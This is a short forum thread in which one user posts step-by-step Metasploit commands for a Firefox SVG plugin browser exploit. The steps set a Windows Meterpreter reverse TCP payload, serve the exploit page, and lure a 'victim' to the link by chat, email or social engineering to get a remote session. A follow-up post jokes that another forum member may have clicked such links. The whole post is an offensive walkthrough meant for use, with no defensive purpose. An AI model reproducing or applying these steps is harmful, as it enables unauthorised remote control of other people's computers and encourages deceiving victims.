PDA

View Full Version : IT WORKS



asux
02-21-2015, 07:46 PM
terminal type msfconsole
Now type use exploit/multi/browser/firefox_svg_plugin
msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)
msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)
msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)
msf exploit (firefox_svg_plugin)>exploit

Now an URL you should give to your victim http://192.168.1.167:8080/

Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

asux
02-21-2015, 07:48 PM
MONDE HAVE YOU USED ANY LINKS LATELY LOLOL